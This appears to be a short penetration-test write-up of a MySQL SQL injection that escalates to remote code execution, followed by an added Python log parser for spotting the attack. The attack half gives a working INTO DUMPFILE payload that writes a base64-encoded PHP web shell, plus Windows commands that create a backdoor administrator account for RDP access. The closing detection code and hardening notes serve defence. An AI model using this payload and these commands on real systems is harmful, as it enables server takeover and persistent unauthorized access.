SQL Injection & Remote Code Execution [MySQL]

GrimTheRipper
Jul 21, 2022


We used sqlmap to verify, and it revealed that the parameter has a SQL injection vulnerability.

We can use the SQL injection to create a file with INTO DUMPFILE and make a simple backdoor encoded with base64.

system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7

y=1') UNION ALL SELECT NULL,...,NULL,"<?php eval(base64_decode('c3lzdGVtKCRfR0VUWyJjbWQiXSk7')); ?>",...,NULL into dumpfile 283shell.php -- -

We can then access the backdoor and execute the “whoami” command.

Then, using the net user command, we create an account to use RDP.

net user sa *password* /add

and add the sa account to the Administrators local group:

net localgroup Administrators sa /add

Log in over RDP with our credentials.

Finally, we are able to log in to RDP.
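
Seen from the defender's side, the chain above leaves two correlated traces in the web server's access log: a request whose decoded query string contains INTO DUMPFILE, followed by requests to the file it named. The Python example below is added here and is not part of the original write-up; the log lines, paths and the function name find_dropped_shell_activity are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (Apache combined format, shortened); not from the page.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Jul/2022:10:01:02 +0000] "GET /item.php?y=1 HTTP/1.1" 200 512
198.51.100.7 - - [21/Jul/2022:10:03:40 +0000] "GET /item.php?y=1%27)%20UNION%20ALL%20SELECT%20NULL,%22PLACEHOLDER%22,NULL%20into%20dumpfile%20%27up/x1.php%27%20--%20- HTTP/1.1" 200 498
203.0.113.9 - - [21/Jul/2022:10:04:00 +0000] "GET /index.php?cmd=about HTTP/1.1" 200 2048
198.51.100.7 - - [21/Jul/2022:10:04:15 +0000] "GET /up/x1.php?cmd=whoami HTTP/1.1" 200 23
"""

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# File-write primitive used in the write-up: SELECT ... INTO DUMPFILE/OUTFILE <target>
FILE_WRITE = re.compile(r"\binto\s+(?:dump|out)file\s+['\"]?([^'\"\s]+)", re.I)

def find_dropped_shell_activity(log_text):
    """Return (writes, hits): SQLi file-write attempts, then requests to the written file."""
    writes, hits, dropped = [], [], {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        query = unquote_plus(url.query)  # decode %27, %20 and + before matching
        basename = url.path.rsplit("/", 1)[-1].lower()
        fw = FILE_WRITE.search(query)
        if fw:
            # Remember only the file name: the on-disk path and the URL path differ.
            name = fw.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower()
            dropped[name] = ts
            writes.append({"ip": ip, "time": ts, "path": url.path, "target": fw.group(1)})
        elif basename in dropped:
            hits.append({"ip": ip, "time": ts, "path": url.path, "query": query,
                         "status": int(status), "written_at": dropped[basename]})
    return writes, hits

if __name__ == "__main__":
    writes, hits = find_dropped_shell_activity(SAMPLE_LOG)
    for w in writes:
        print(f"[file-write SQLi] {w['time']} {w['ip']} {w['path']} -> {w['target']}")
    for h in hits:
        print(f"[dropped-file hit] {h['time']} {h['ip']} {h['path']}?{h['query']} ({h['status']})")
```

Access logs record only the URL, so an injection sent in a POST body needs request-body or database query logging to be seen. On the database side, an empty secure_file_priv value together with the FILE privilege on the application's MySQL account is what allows INTO DUMPFILE to write into the web root.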
